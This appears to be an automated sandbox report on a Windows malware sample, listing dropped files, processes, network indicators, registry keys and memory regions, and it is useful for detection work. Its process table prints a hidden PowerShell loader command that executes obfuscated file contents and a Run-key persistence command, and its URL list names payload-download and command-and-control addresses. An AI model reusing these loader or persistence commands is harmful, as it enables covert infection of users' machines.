Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
160420241245287.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\Untapestried.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs\tailors.ver
|
DOS executable (COM)
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\545Ni1I
|
SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie
0x24, schema 4, UTF-8, version-valid-for 2
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\Untapestried.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4aiyf0sq.2em.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zmgewwff.qui.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\nsz69A6.tmp
|
OpenPGP Public Key
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\Angelsakserens\Satsfremstillings\Nonascription80.gau
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\Angelsakserens\Satsfremstillings\Palter102.sus
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\Angelsakserens\Satsfremstillings\Pottinger.qua
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\Angelsakserens\Satsfremstillings\Retranslating88.spo
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\Angelsakserens\Satsfremstillings\Stachyose225.pen
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\Angelsakserens\Satsfremstillings\Superabhor153.gru
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\Angelsakserens\Satsfremstillings\Toparchia26.hem
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\Angelsakserens\Satsfremstillings\Trilaurin91.yep
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\Angelsakserens\Satsfremstillings\aarsindkomstens.pac
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\Angelsakserens\Satsfremstillings\afspilleudstyr.txt
|
ASCII text, with very long lines (432), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\Angelsakserens\Satsfremstillings\amperemetrenes.bef
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\Dkningskontrol\Grfabrikken.ind
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\Pleasingly\Merosomal\Storkunderabatternes\metoac\Hexobiose.pri
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\Pleasingly\Merosomal\Storkunderabatternes\metoac\Kogevaskens.uva
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\Pleasingly\Merosomal\Storkunderabatternes\metoac\Liquidated161.gas
|
Dyalog APL component file 32-bit level 2 journaled checksummed version -44.2
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Aldehydet209.jum
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\striper.Gui
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\Udtydedes\Intendant\bumaree\explosimeter.adv
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\Udtydedes\Intendant\bumaree\eyeletter.ove
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\Udtydedes\Intendant\bumaree\lntrykkers.sol
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\Udtydedes\Intendant\bumaree\microspectrophotometers.fol
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\Udtydedes\Intendant\bumaree\nakkede.rat
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\Udtydedes\Intendant\bumaree\operationssygeplejerskerne.nin
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\Udtydedes\Intendant\bumaree\orthodontic.vel
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\Udtydedes\Intendant\bumaree\produktionscheferne.eks
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\Udtydedes\Intendant\bumaree\rdgrden.ber
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\Udtydedes\Intendant\bumaree\rinch.kon
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\Udtydedes\Intendant\bumaree\sanseredskaberne.cat
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\antipyic.pre
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\appeldomstolene.slu
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\barsles.gab
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\beskyttelsestoldsatsers.afl
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\blandingerne.sly
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\catalogue.str
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\christierns.sej
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs\skraverings.tyl
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs\tillidsposter.dox
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs\unavailed.etp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs\vindmlleprojekters.laz
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\dacryohemorrhea.udt
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\damnificatus.uge
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\epispadiac.kal
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\equality.kon
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\opbevaringssteder\etape.sil
|
data
|
dropped
|
There are 45 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\160420241245287.exe
|
"C:\Users\user\Desktop\160420241245287.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$Titelbladenes=Get-Content 'C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf';$Ryslerne=$Titelbladenes.SubString(75194,3);.$Ryslerne($Titelbladenes)"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
|
|
|
|
C:\Users\user\AppData\Local\Temp\Untapestried.exe
|
"C:\Users\user\AppData\Local\Temp\Untapestried.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ
/d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)"
|
|
|
|
C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe
|
"C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\SysWOW64\cmd.exe"
|
|
|
|
C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe
|
"C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe"
|
|
|
|
C:\Program Files\Mozilla Firefox\firefox.exe
|
"C:\Program Files\Mozilla Firefox\Firefox.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle
minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)"
|
There are 2 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://duckduckgo.com/chrome_newtab
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://n-benriya002.com/9pdo/?edR0hF=REEnkW6M
|
unknown
|
||
|
https://duckduckgo.com/ac/?q=
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://www.eternalsunrise.xyz
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://www.ejbodyart.com/9pdo/?jzuh=7Bfls2&edR0hF=DnYaRovP48GzkkJrYMXu2fP+AE8bpUHwuVP/6iFiedv+ORSC+0oTk/Kl1D7Kx2hOtjeczUyzMCTs4BuiBiMVyf8d4q8oRy488on7FLg2VDUaCWqziINF2DU=
|
112.175.50.218
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://www.jt-berger.store/9pdo/
|
217.160.0.183
|
||
|
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
|
http://www.ftp.ftp://ftp.gopher.
|
unknown
|
||
|
http://www.n-benriya002.com/9pdo/
|
219.94.128.41
|
||
|
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
|
unknown
|
||
|
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
|
https://www.ecosia.org/newtab/
|
unknown
|
||
|
https://aka.ms/pscore6lBqq
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://www.jt-berger.store/9pdo/?edR0hF=9/X38tn9qLO2xSF02XNB/rY3zD6RCSMCRmtcXfkuabXCkgKRDBhcw5zs5NSemU/1fww/nV1egvBpaCqwFniev+GXC9dB/42VqWS3YgLMlW8u3PKxI03yuVQ=&jzuh=7Bfls2
|
217.160.0.183
|
||
|
http://103.14.155.180/CkkRLCTUxW193.binO
|
unknown
|
||
|
http://www.n-benriya002.com/9pdo/?edR0hF=REEnkW6M+TEq7R0RTFAEOK6A593ZXFJD8cCdAclTZkEAO29Celit1EJdRt8L6G9Xd5xqtutsMklg2OrtOvYkqvTyuEt4cazTHdJ4IhgWhtZseUa+ZlJk5aI=&jzuh=7Bfls2
|
219.94.128.41
|
||
|
http://103.14.155.180/CkkRLCTUxW193.bin3c
|
unknown
|
||
|
https://ac.ecosia.org/autocomplete?q=
|
unknown
|
||
|
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
|
unknown
|
||
|
http://103.14.155.180/CkkRLCTUxW193.bin
|
103.14.155.180
|
||
|
http://103.14.155.180/i
|
unknown
|
||
|
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
|
unknown
|
||
|
http://103.14.155.180/It3
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
|
unknown
|
||
|
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
|
unknown
|
||
|
http://www.scwspark.com/9pdo/
|
81.88.63.46
|
||
|
http://103.14.155.180/
|
unknown
|
||
|
http://103.14.155.180/NTIFIER=Intel64
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
|
unknown
|
||
|
http://www.scwspark.com/9pdo/?edR0hF=exLCvVI2E5RJM8xtzs4Hapiqzu/uGv/f+6d2cWgRCMmdoFVcUWazUq40e3zK6s54E+NAVH76kqhd1uh4f2sEtFmHSsWrMW9P35+QXkOmQzbQkkc9XIR6mDA=&jzuh=7Bfls2
|
81.88.63.46
|
||
|
http://www.eternalsunrise.xyz/9pdo/
|
66.29.135.159
|
||
|
http://103.14.155.180/CkkRLCTUxW193.bin.
|
unknown
|
There are 31 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
www.eternalsunrise.xyz
|
66.29.135.159
|
|
|
|
www.ejbodyart.com
|
unknown
|
|
|
|
www.n-benriya002.com
|
unknown
|
|
|
|
ejbodyart.com
|
112.175.50.218
|
||
|
n-benriya002.com
|
219.94.128.41
|
||
|
www.scwspark.com
|
81.88.63.46
|
||
|
www.jt-berger.store
|
217.160.0.183
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
66.29.135.159
|
www.eternalsunrise.xyz
|
United States
|
|
|
|
103.14.155.180
|
unknown
|
unknown
|
||
|
219.94.128.41
|
n-benriya002.com
|
Japan
|
||
|
81.88.63.46
|
www.scwspark.com
|
Italy
|
||
|
217.160.0.183
|
www.jt-berger.store
|
Germany
|
||
|
112.175.50.218
|
ejbodyart.com
|
Korea Republic of
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\bombens\blacklead
|
amical
|
||
|
HKEY_CURRENT_USER\SOFTWARE\spilledaases\hacks
|
Iodizers
|
||
|
HKEY_CURRENT_USER\Ciconiform
|
Syskerne
|
||
|
HKEY_CURRENT_USER\Environment
|
Divergente
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Lgplante
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1100000
|
system
|
page execute and read and write
|
|
|
|
2830000
|
system
|
page execute and read and write
|
|
|
|
21220000
|
unclassified section
|
page execute and read and write
|
|
|
|
201B0000
|
unclassified section
|
page execute and read and write
|
|
|
|
2EB0000
|
trusted library allocation
|
page read and write
|
|
|
|
3350000
|
unkown
|
page execute and read and write
|
|
|
|
2E70000
|
trusted library allocation
|
page read and write
|
|
|
|
BC43000
|
direct allocation
|
page execute and read and write
|
|
|
|
2D71000
|
heap
|
page read and write
|
||
|
2A35000
|
heap
|
page read and write
|
||
|
329A000
|
trusted library allocation
|
page execute and read and write
|
||
|
A75C1FB000
|
stack
|
page read and write
|
||
|
7460000
|
heap
|
page read and write
|
||
|
407000
|
unkown
|
page readonly
|
||
|
4D27000
|
heap
|
page read and write
|
||
|
1EC11B00000
|
trusted library allocation
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
6817000
|
trusted library allocation
|
page read and write
|
||
|
1EC11AE0000
|
heap
|
page read and write
|
||
|
48A000
|
unkown
|
page readonly
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
21FE000
|
stack
|
page read and write
|
||
|
3AE4000
|
unclassified section
|
page read and write
|
||
|
20170000
|
direct allocation
|
page read and write
|
||
|
1EC11C16000
|
trusted library allocation
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
85DE000
|
stack
|
page read and write
|
||
|
28D4000
|
heap
|
page read and write
|
||
|
79AE000
|
stack
|
page read and write
|
||
|
A4E000
|
unkown
|
page readonly
|
||
|
409000
|
unkown
|
page write copy
|
||
|
71E0000
|
direct allocation
|
page read and write
|
||
|
4CFF000
|
stack
|
page read and write
|
||
|
1200000
|
unkown
|
page readonly
|
||
|
5E4000
|
unkown
|
page write copy
|
||
|
1FDFF000
|
stack
|
page read and write
|
||
|
100F2000
|
system
|
page read and write
|
||
|
2A4C000
|
heap
|
page read and write
|
||
|
7B20000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
510000
|
heap
|
page read and write
|
||
|
5F2000
|
unkown
|
page write copy
|
||
|
29CA000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2C98000
|
heap
|
page read and write
|
||
|
24A0000
|
heap
|
page read and write
|
||
|
A4E000
|
unkown
|
page readonly
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
4810000
|
direct allocation
|
page read and write
|
||
|
2023A000
|
heap
|
page read and write
|
||
|
366F000
|
unkown
|
page read and write
|
||
|
A843000
|
direct allocation
|
page execute and read and write
|
||
|
3C76000
|
unclassified section
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
3030000
|
trusted library allocation
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
7F790000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
565000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
20323000
|
heap
|
page read and write
|
||
|
304F000
|
heap
|
page read and write
|
||
|
4490000
|
heap
|
page read and write
|
||
|
A57000
|
unkown
|
page readonly
|
||
|
3360000
|
heap
|
page readonly
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
7705000
|
heap
|
page read and write
|
||
|
641E000
|
stack
|
page read and write
|
||
|
2840000
|
heap
|
page read and write
|
||
|
A41000
|
unkown
|
page execute read
|
||
|
2784000
|
heap
|
page read and write
|
||
|
2CD2000
|
unkown
|
page read and write
|
||
|
7210000
|
direct allocation
|
page read and write
|
||
|
89C0000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
A57000
|
unkown
|
page readonly
|
||
|
2F8D000
|
stack
|
page read and write
|
||
|
218B0000
|
unclassified section
|
page execute and read and write
|
||
|
10032000
|
system
|
page read and write
|
||
|
32A5000
|
trusted library allocation
|
page execute and read and write
|
||
|
7EDE000
|
stack
|
page read and write
|
||
|
32A2000
|
trusted library allocation
|
page read and write
|
||
|
42B000
|
unkown
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
294F000
|
stack
|
page read and write
|
||
|
D2F000
|
stack
|
page read and write
|
||
|
B90000
|
unkown
|
page readonly
|
||
|
2BE0000
|
unkown
|
page readonly
|
||
|
E0B000
|
unkown
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
769A000
|
heap
|
page read and write
|
||
|
34E2000
|
unclassified section
|
page read and write
|
||
|
2A22000
|
heap
|
page read and write
|
||
|
518000
|
heap
|
page read and write
|
||
|
B4A000
|
stack
|
page read and write
|
||
|
F00000
|
heap
|
page read and write
|
||
|
4771000
|
heap
|
page read and write
|
||
|
11E0000
|
unkown
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2029C000
|
heap
|
page read and write
|
||
|
7C30000
|
heap
|
page read and write
|
||
|
7B6C000
|
stack
|
page read and write
|
||
|
80E000
|
stack
|
page read and write
|
||
|
E9E000
|
unkown
|
page read and write
|
||
|
B243000
|
direct allocation
|
page execute and read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
8600000
|
trusted library allocation
|
page read and write
|
||
|
A55000
|
unkown
|
page read and write
|
||
|
2A03000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2690000
|
unkown
|
page readonly
|
||
|
7446000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
1EC11C12000
|
trusted library allocation
|
page read and write
|
||
|
1EC10223000
|
heap
|
page read and write
|
||
|
353C000
|
unclassified section
|
page read and write
|
||
|
46F0000
|
heap
|
page read and write
|
||
|
8904000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
24FB000
|
stack
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
44A000
|
unkown
|
page readonly
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2FC6000
|
heap
|
page read and write
|
||
|
7C45000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
8B00000
|
trusted library allocation
|
page read and write
|
||
|
71B0000
|
direct allocation
|
page read and write
|
||
|
85F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A1F000
|
heap
|
page read and write
|
||
|
3422000
|
unclassified section
|
page read and write
|
||
|
2E98000
|
stack
|
page read and write
|
||
|
6220000
|
trusted library allocation
|
page read and write
|
||
|
8900000
|
heap
|
page read and write
|
||
|
1FB9D000
|
stack
|
page read and write
|
||
|
78E000
|
stack
|
page read and write
|
||
|
887C000
|
stack
|
page read and write
|
||
|
2950000
|
unkown
|
page execute and read and write
|
||
|
89A6000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2E5C000
|
stack
|
page read and write
|
||
|
7AE0000
|
trusted library allocation
|
page read and write
|
||
|
2A88000
|
heap
|
page read and write
|
||
|
2C90000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2044C000
|
heap
|
page read and write
|
||
|
7205000
|
heap
|
page execute and read and write
|
||
|
EF0000
|
unkown
|
page readonly
|
||
|
1EC11D01000
|
trusted library allocation
|
page read and write
|
||
|
1280000
|
unkown
|
page readonly
|
||
|
1EC11DA5000
|
trusted library allocation
|
page read and write
|
||
|
A01000
|
unkown
|
page readonly
|
||
|
8500000
|
heap
|
page read and write
|
||
|
2D92000
|
unkown
|
page read and write
|
||
|
48A000
|
unkown
|
page readonly
|
||
|
7A70000
|
trusted library allocation
|
page read and write
|
||
|
303E000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
3F9A000
|
unclassified section
|
page read and write
|
||
|
2300000
|
heap
|
page read and write
|
||
|
3030000
|
trusted library allocation
|
page read and write
|
||
|
1178000
|
system
|
page execute and read and write
|
||
|
2EA2000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
7440000
|
heap
|
page read and write
|
||
|
29BF000
|
heap
|
page read and write
|
||
|
5071000
|
trusted library allocation
|
page read and write
|
||
|
78C0000
|
trusted library allocation
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
20812000
|
direct allocation
|
page execute and read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
71A000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
1000000
|
unkown
|
page read and write
|
||
|
F07000
|
heap
|
page read and write
|
||
|
46C0000
|
direct allocation
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
AC0000
|
unkown
|
page readonly
|
||
|
7C31000
|
heap
|
page read and write
|
||
|
274D000
|
stack
|
page read and write
|
||
|
4800000
|
direct allocation
|
page read and write
|
||
|
2CB6000
|
heap
|
page read and write
|
||
|
1EC11DC4000
|
trusted library allocation
|
page read and write
|
||
|
1FDBE000
|
stack
|
page read and write
|
||
|
10004000
|
unkown
|
page readonly
|
||
|
29BB000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
1FEA0000
|
direct allocation
|
page read and write
|
||
|
2A60000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
78D0000
|
trusted library allocation
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
32C0000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
1EC1020C000
|
heap
|
page read and write
|
||
|
44A000
|
unkown
|
page readonly
|
||
|
4960000
|
heap
|
page read and write
|
||
|
DF7000
|
heap
|
page read and write
|
||
|
A30000
|
unkown
|
page readonly
|
||
|
9F0000
|
unkown
|
page read and write
|
||
|
7E5C000
|
stack
|
page read and write
|
||
|
6071000
|
trusted library allocation
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
5672000
|
trusted library allocation
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
4547000
|
heap
|
page read and write
|
||
|
1020000
|
heap
|
page read and write
|
||
|
767000
|
heap
|
page read and write
|
||
|
2230000
|
heap
|
page read and write
|
||
|
201F0000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
3350000
|
heap
|
page read and write
|
||
|
BA0000
|
unkown
|
page readonly
|
||
|
28B0000
|
heap
|
page read and write
|
||
|
621A000
|
trusted library allocation
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
28D4000
|
heap
|
page read and write
|
||
|
37A0000
|
heap
|
page read and write
|
||
|
22DC000
|
stack
|
page read and write
|
||
|
3290000
|
trusted library allocation
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
1EC10223000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
5D0000
|
unkown
|
page readonly
|
||
|
1EC11AF0000
|
trusted library allocation
|
page read and write
|
||
|
30C0000
|
heap
|
page read and write
|
||
|
5EC000
|
unkown
|
page write copy
|
||
|
5B0000
|
unkown
|
page readonly
|
||
|
30FF000
|
stack
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
4C0000
|
heap
|
page read and write
|
||
|
2CD2000
|
unkown
|
page read and write
|
||
|
BFE000
|
stack
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
29C9000
|
heap
|
page read and write
|
||
|
2CB4000
|
heap
|
page read and write
|
||
|
30EA000
|
heap
|
page read and write
|
||
|
407000
|
unkown
|
page readonly
|
||
|
3260000
|
trusted library allocation
|
page read and write
|
||
|
7160000
|
direct allocation
|
page read and write
|
||
|
7C3B000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
A75D9FE000
|
stack
|
page read and write
|
||
|
4771000
|
heap
|
page read and write
|
||
|
3273000
|
trusted library allocation
|
page execute and read and write
|
||
|
6207000
|
trusted library allocation
|
page read and write
|
||
|
1660000
|
remote allocation
|
page execute and read and write
|
||
|
4890000
|
direct allocation
|
page read and write
|
||
|
7150000
|
direct allocation
|
page read and write
|
||
|
83A000
|
stack
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
7C48000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
1EC11C00000
|
trusted library allocation
|
page read and write
|
||
|
4787000
|
heap
|
page read and write
|
||
|
3390000
|
heap
|
page read and write
|
||
|
A57000
|
unkown
|
page readonly
|
||
|
3270000
|
trusted library allocation
|
page read and write
|
||
|
2A20000
|
unkown
|
page read and write
|
||
|
28D4000
|
heap
|
page read and write
|
||
|
2A84000
|
heap
|
page read and write
|
||
|
70000
|
heap
|
page read and write
|
||
|
7A60000
|
trusted library allocation
|
page read and write
|
||
|
767E000
|
heap
|
page read and write
|
||
|
2A4F000
|
heap
|
page read and write
|
||
|
2A99000
|
heap
|
page read and write
|
||
|
774A000
|
heap
|
page read and write
|
||
|
9F0000
|
unkown
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
A75D1FE000
|
stack
|
page read and write
|
||
|
1EC10170000
|
heap
|
page read and write
|
||
|
857E000
|
stack
|
page read and write
|
||
|
47F0000
|
direct allocation
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
71F0000
|
direct allocation
|
page read and write
|
||
|
2079D000
|
direct allocation
|
page execute and read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
7C5E000
|
heap
|
page read and write
|
||
|
843F000
|
stack
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2780000
|
heap
|
page read and write
|
||
|
1803000
|
remote allocation
|
page execute and read and write
|
||
|
33AB000
|
heap
|
page read and write
|
||
|
334E000
|
stack
|
page read and write
|
||
